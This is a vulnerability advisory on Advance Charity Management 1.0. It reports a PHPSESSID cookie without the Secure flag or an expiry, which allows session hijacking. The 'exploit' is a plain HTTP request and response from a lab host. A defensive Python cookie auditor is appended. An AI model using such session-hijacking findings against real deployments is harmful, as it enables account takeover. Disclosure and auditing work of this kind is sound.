## Title: Advance Charity Management 1.0 - TLS cookie without Secure flag set / PHPSESSID never expires / current-session hijacking

## Author: nu11secur1ty

## Date: 06.04.2023

## Vendor: https://www.sourcecodester.com/users/aown-shah

## Software: https://www.sourcecodester.com/php/16607/advance%C2%A0charity-management-system.html

## Reference: https://portswigger.net/kb/issues/00500600_cookie-without-httponly-flag-set

## Description:

The following cookie was issued by the application and does not have the Secure flag set: PHPSESSID. The cookie appears to contain a session token, which increases the risk associated with this issue. You should review the contents of the cookie to determine its function. An attacker who uses the same browser on the same machine can connect as the user who was already logged in before that moment, and can do very nasty stuff with this already authenticated account. This is a 100% CRITICAL SITUATION if it happens inside the level-2 network of a company.
STATUS: HIGH Vulnerability

[+]Exploit:

```http
GET /pwnedhost7/members/ HTTP/1.1
Host: pwnedhost7.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost7.com/pwnedhost7/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="114", "Chromium";v="114"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Sun, 04 Jun 2023 10:13:00 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Set-Cookie: PHPSESSID=hudiao5n9p6rjld5oaju24lbca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25629

Notice: Undefined index: rainbow_uid in C:\xampp7.4\htdocs\pwnedhost7\members\header.php on line 7

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, bool given in C:\xampp7.4\htdocs\pwnedhost7\members\header.php on line 12
```

## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Aown-Shah/2023/Advance-Charity-Management-1.0)

## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/advance-charity-management-10-tls.html)

## Time spent: 00:37:00
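As an added example (not code from the advisory or from the vendor), a small Python auditor that parses Set-Cookie headers like the one in the response above and reports which protective attributes each cookie lacks; the sample response and the hardened variant are constructed, and the session id is a placeholder rather than the captured value.

```python
from typing import Dict, List

# Constructed sample modelled on the advisory's response; the session id
# is a placeholder, not the value captured in the report.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30\r\n"
    "Set-Cookie: PHPSESSID=placeholdersessionid0000000; path=/\r\n"
    "Expires: Thu, 19 Nov 1981 08:52:00 GMT\r\n\r\n"
)

# The same cookie as PHP emits it with session.cookie_secure,
# session.cookie_httponly, session.cookie_samesite and a finite
# session.cookie_lifetime configured (constructed, not from the page).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=placeholdersessionid0000000; path=/; "
    "Max-Age=1800; Secure; HttpOnly; SameSite=Lax\r\n\r\n"
)


def parse_set_cookies(raw: str) -> Dict[str, Dict[str, str]]:
    """Return {cookie_name: {attribute_lowercase: value}} per Set-Cookie header.
    Only Set-Cookie lines count: the response-level Expires header is a cache directive."""
    cookies: Dict[str, Dict[str, str]] = {}
    for line in raw.split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        name_value, *attr_parts = line.split(":", 1)[1].split(";")
        name = name_value.strip().split("=", 1)[0]
        attrs: Dict[str, str] = {}
        for part in attr_parts:
            key, _, value = part.strip().partition("=")
            attrs[key.lower()] = value
        cookies[name] = attrs
    return cookies


def audit_cookies(raw: str) -> Dict[str, List[str]]:
    """Map each cookie to the protections it lacks (empty list if hardened)."""
    findings: Dict[str, List[str]] = {}
    for name, attrs in parse_set_cookies(raw).items():
        checks = [
            ("Secure", "secure" in attrs),      # else it may travel over plaintext HTTP
            ("HttpOnly", "httponly" in attrs),  # else page scripts can read it
            ("SameSite", "samesite" in attrs),
            ("Expires/Max-Age", "expires" in attrs or "max-age" in attrs),  # else it lives until browser exit
        ]
        findings[name] = [label for label, ok in checks if not ok]
    return findings
```

Run `audit_cookies` over a captured response to get a per-cookie list of missing attributes; a session cookie with a non-empty list is the finding this advisory describes.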